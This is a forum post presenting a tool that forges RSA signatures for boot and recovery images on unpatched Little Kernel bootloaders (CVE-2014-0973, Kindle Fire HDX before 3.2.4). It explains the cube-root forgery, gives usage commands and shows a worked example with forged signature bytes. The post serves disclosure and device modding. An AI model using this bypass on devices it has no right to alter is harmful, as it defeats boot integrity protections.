[Tool] Signing tool for pre 3.2.4 booloaders topic

I am proud to present you my image signing tool called Cuber.
The name is an abbreviation of Cube Root finder. This is basically what the tool does.

About

This is a tool that checks and signs recovery/boot images for Little Kernel bootloaders missing the patch for for CVE-2014-0973.

Who is vulnurable?

Kindle Fire HDX tablets with firmware versions older than 3.2.4. On 3.2.4 it is NOT working.
Probably many devices using pre 13 June 2014 Little Kernel bootloaders. (no guarantees)

Requirements on an Ubuntu system:

Code:

---

gcc
libmpc-dev
libmpfr-dev
libgmp3-dev
libssl-dev
python
python-pip

---

Also the following python package is required:

Code:

---

gmpy2

---

install it using pip:

Code:

---

sudo pip install gmpy2

---

Installation

Download the source code from https://github.com/Verteo/Cuber to your desired folder, go to the folder and run make.

Usage

Code:

---

Cuber -check path/to/image.img

---

checks if the image would pass the signature verification

Code:

---

Cuber -sign path/to/input/image.img path/to/output/image.img

---

creates a signature for the given image and creates a new signed at the specified location

The files prodcert.pem and signature.py are required by the application to work

Why python?

It is easier to handle bignums in python than in c++.

The exploit

https://www.codeaurora.org/projects/...-cve-2014-0973
The bootloader is not properly checking the number of bytes decrypted from the signature. This allows us insert to garbage bytes and create a forged signature.
A PKCS#1 v1.5 padded signature starts with 00 01 PS 00.
PS is the padding string and consists at least of 8 FF bytes
After the start of the signature comes the 32 byte long SHA256 image hash.
So the decrypted (cubed) signature should look something like this:

Code:

---

00 01 FF FF FF FF FF FF FF FF 00 xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..

---

Where xx is the hash and the .. are the garbage bytes.
The garbage byte can have an arbitrary value. We use them to create a perfect cube root.

Example

Hash of example image:

Code:

---

A9 07 1C A3 31 43 16 F7 2E 9A FF B3 31 46 A6 EC 60 6E DE 42 45 9E 4C 9B 6B 5F B0 E1 97 1C 33 85

---

Desired cubed signature:

Code:

---

00 01 FF FF FF FF FF FF FF FF 00 A9 07 1C A3 31
43 16 F7 2E 9A FF B3 31 46 A6 EC 60 6E DE 42 45
9E 4C 9B 6B 5F B0 E1 97 1C 33 85 .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..

---

Generated signature:

Code:

---

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 32 CB FD 4A 7A
DC 79 05 58 41 75 78 07 60 1D 4F D5 09 9A 22 ED
4A F3 B3 46 62 94 03 A0 78 BF AE E1 FF 07 49 B4
98 C9 C7 F6 96 A1 66 E1 3A D0 8A 97 9D 82 4D 64
08 4E 91 B1 D3 F8 EB 97 81 57 92 97 D3 F2 E5 D5
6F A4 6C DC 91 79 11 A4 9F 23 83 4E A4 84 20 C0

---

Generated signature cubed:

Code:

---

00 01 FF FF FF FF FF FF FF FF 00 A9 07 1C A3 31
43 16 F7 2E 9A FF B3 31 46 A6 EC 60 6E DE 42 45
9E 4C 9B 6B 5F B0 E1 97 1C 33 85 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 8D C2 E5 F5 65 19 0A BA 69 BA
14 29 BE 83 F4 2E 61 04 3E 1E 59 79 3C C6 D6 D8
D0 59 D1 46 E4 D4 86 B8 D4 A0 C1 2F 3A 4C 72 F7
F4 14 E7 CF CE 3F 5D A3 53 25 D6 7B 7B 83 AF 66
B8 42 A7 06 79 7C 31 69 51 43 F6 83 B2 29 65 81
F5 B0 9D 93 77 6B BA 83 52 C0 F0 68 93 AF 65 9E
19 F2 EC 9D 9A 76 90 30 15 5F F5 B5 88 EB 89 FE
CB DC 3A 4E D7 71 32 E3 10 FF 39 C0 C0 73 47 71
A2 C4 07 7A 3C E2 F7 96 68 A3 C8 35 40 33 02 A5
AA 4E CB BB AC 56 DB 98 F2 50 76 BD A7 82 6E C3
AC 34 F4 E9 E7 87 99 43 B4 6E 94 67 F6 6C 00 00

---

As you may notice this is valid signature.

Disclaimer

I'm not an expert at cryptography, my statements may be false or incomplete.